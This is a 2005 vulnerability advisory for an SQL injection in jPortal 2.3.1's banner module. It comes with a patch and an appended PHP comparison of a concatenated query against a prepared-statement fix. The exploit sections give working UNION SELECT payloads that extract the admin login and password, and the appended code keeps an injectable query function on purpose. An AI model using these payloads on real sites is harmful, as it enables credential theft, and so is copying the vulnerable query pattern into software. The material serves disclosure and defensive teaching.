jportal231.txt

18 Apr 2005 | Reported by Marcin Krupowicz | Type: packetstorm | Source: packetstormsecurity.com

SQL injection vulnerability found in jPortal version 2.3.1 affecting the banner module.

Code
`Hello BugTraq,  
  
I've found a possibility to inject SQL code in jPortal version 2.3.1, in the  
module "banner" (module/banner.inc.php).  
  
Bug is in these lines of code:  
[code]  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code] - line 192.  
  
There is an unfiltered variable $haslo. In order to patch this code, just do this:  
[code]  
$haslo = addslashes($haslo);  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code]  
  
[exploit]  
go to http://[victim]/jportal/banner.php and try this:  
  
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
and then:  
  
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
After that, you gain the login and password of the administrator.  
[/exploit]  
  
[exploit2]  
try to inject this code:  
' or id='x x - banner id  
After that, You can see statistics of not banners, to which you  
haven't got passwords.  
[/exploit2]  
  
Vendor (http://jportal2.com) has been informed already.  
  
--   
Best regards,  
Marcin "CiNU5" Krupowicz  
`
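
An added example, not part of the original advisory or jPortal's own code: the query shape from line 192 next to a prepared-statement form, run through PDO against a constructed in-memory SQLite table. The table layout, sample row and helper names (`banner_table`, `lookup_vulnerable`, `lookup_prepared`) are assumptions; binding the value keeps `$haslo` out of the SQL text entirely, unlike `addslashes()`, which is not character-set aware.

```php
<?php
// Added example: constructed schema and data, not jPortal's real tables.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE banners (id INTEGER PRIMARY KEY, title TEXT, views INTEGER)");
$db->exec("INSERT INTO banners (title, views) VALUES ('spring-sale', 120)");

// A table name cannot be a bound parameter, so it is checked against an allow-list.
function banner_table(string $name): string {
    $allowed = ['banners'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    return $name;
}

// Same shape as the advisory's line 192: $haslo is concatenated into the SQL text.
function lookup_vulnerable(PDO $db, string $tbl, string $haslo): array {
    $query = "SELECT * FROM $tbl WHERE title='$haslo' ORDER BY id DESC";
    return $db->query($query)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: $haslo travels as a bound value and is never parsed as SQL.
function lookup_prepared(PDO $db, string $tbl, string $haslo): array {
    $sql = 'SELECT * FROM ' . banner_table($tbl) . ' WHERE title = :title ORDER BY id DESC';
    $stmt = $db->prepare($sql);
    $stmt->execute([':title' => $haslo]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Input of the form quoted in the advisory's second case, with banner id 1.
$probe = "' or id='1";

// The concatenated query matches the banner without knowing its title;
// the prepared query compares the whole string against title and matches nothing.
printf("concatenated: %d row(s)\n", count(lookup_vulnerable($db, 'banners', $probe)));
printf("prepared:     %d row(s)\n", count(lookup_prepared($db, 'banners', $probe)));

// A legitimate title still works through the prepared path.
printf("legitimate:   %d row(s)\n", count(lookup_prepared($db, 'banners', 'spring-sale')));
```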
